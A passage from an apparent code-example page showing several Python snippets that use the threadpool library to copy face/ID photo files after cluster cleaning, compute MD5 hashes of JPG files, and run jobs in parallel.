def get_clean_result(id_relation_path, id_score_clean_path, id_clean_result):
    cp_list = []
    fun_var = []
    # get the live surveillance photo files
    id_path_list, id_path_pic_list = get_live_pic_path_list(id_relation_path)
    # get the cleaning-score path
    id_cluster_clean_path = id_score_clean_path.replace(
        "id_score.txt", "id_cluster.txt")
    print id_cluster_clean_path
    id_cluster_clean_handle = open(id_cluster_clean_path, "r")
    lines = id_cluster_clean_handle.readlines()
    id_cluster_clean_handle.close()
    # build the cluster-info list for later lookup
    cluster_info = []
    cnt = 0
    for line in lines:
        cnt = cnt + 1
        print "get_clean_cluster_info:", cnt, "/", len(lines)
        line = line.strip("\n")
        tag = line.split("@")[-1]
        id_path_pic = line.split("@")[0]
        id_path = id_path_pic.split("#")[0]
        if [id_path_pic, tag, id_path] not in cluster_info:
            cluster_info.append([id_path_pic, tag, id_path])

    cnt = 0
    for id_path_pic in id_path_pic_list:
        cnt = cnt + 1
        print "get_clean:", cnt, "/", len(id_path_pic_list)
        # find the tag of the live surveillance photo
        live_cluster_info_find = my_find(id_path_pic, 0, cluster_info)
        if live_cluster_info_find == []:
            continue
        live_cluster_info_tag = live_cluster_info_find[1]
        # get the corresponding identity info
        live_cluster_info_id_path = live_cluster_info_find[0].split("#")[0]
        # find all entries with the same id
        live_cluster_info_finds = my_finds(live_cluster_info_id_path, 2,
                                           cluster_info)
        if live_cluster_info_finds == []:
            continue
        for live_cluster_info in live_cluster_info_finds:
            img_path = path_char.join(live_cluster_info[0].split("#"))
            img_name = live_cluster_info[0].split("#")[-1]
            tag_check = live_cluster_info[1]
            if tag_check != live_cluster_info_tag:
                id_name = live_cluster_info_id_path.split(path_char)[-1]
                if not os.path.exists(os.path.join(id_clean_result, id_name)):
                    print "mkdir", os.path.join(id_clean_result, id_name)
                    os.mkdir(os.path.join(id_clean_result, id_name))
                cp_list.append([
                    img_path,
                    os.path.join(id_clean_result, id_name, img_name)
                ])

    for i in range(0, len(cp_list)):
        cpfile_A = cp_list[i][0]
        cpfile_B = cp_list[i][1]
        fun_var.append(([cpfile_A, cpfile_B, i, len(cp_list) - 1], None))
    pool = threadpool.ThreadPool(10)
    requests = threadpool.makeRequests(cp_exec, fun_var)
    [pool.putRequest(req) for req in requests]
    pool.wait()
Example #28
def main():
    l = ['11111', '22222', '33333', '44444', '55555']
    pool = threadpool.ThreadPool(5)  # create a thread pool
    requests = threadpool.makeRequests(loop1, l)  # pass the function and the arguments it needs
    [pool.putRequest(req) for req in requests]  # submit each work request to the pool
    pool.wait()  # wait for every thread in the pool to finish
Example #29
import time
import random
import threadpool


def get_hash(path):
    file = open(path, 'rb').read()
    md5 = hashlib.md5(file).hexdigest()
    print(path, md5)


def get_queue(path):
    dui_lie = []
    file_stream = os.walk(path, True)
    for dirs in file_stream:
        prepath = dirs[0]
        for k in dirs[2]:
            if '.JPG' in k:
                filename = k
                p = prepath + '/' + filename
                dui_lie.append(p)
    return dui_lie


if __name__ == '__main__':
    duilie = get_queue('/Volumes/qifei/照片汇总')
    pool2 = threadpool.ThreadPool(100)
    for n in threadpool.makeRequests(get_hash, duilie):
        pool2.putRequest(n)
    pool2.wait()
Example #30
    for attr in attrs:
        # if attr in notdealed:
        # source_url.append(source_addr + attr)
        # dire_url.append(dire_addr + attr)#attr[0: attr.index('.')] + r"_ID.txt")
        source_url = []
        source_url.append(source_addr + attr)
        source_url.append(dire_addr +
                          attr)  #attr[0: attr.index('.')] + r"_ID.txt")
        # print(source_url)

        # func.append((source_url,None))
        func.append(source_url)
    # print(func)
    # exit()
    """多线程编程"""
    pool = tp.ThreadPool(len(attrs))
    requests = tp.makeRequests(job, func)
    [pool.putRequest(req) for req in requests]
    pool.wait()
    # print(source_url[0],dire_url[0])
    # exit()
    # job(source_url[0],dire_url[0])
    # print(source_url)
    # exit()
    # p1 = mp.Process(target=job,args=(source_url,dire_url,),name='p1')
    # p1.start()
    # p1.join()
    # # print(source_url)
    # # print(dire_url)
    # # exit()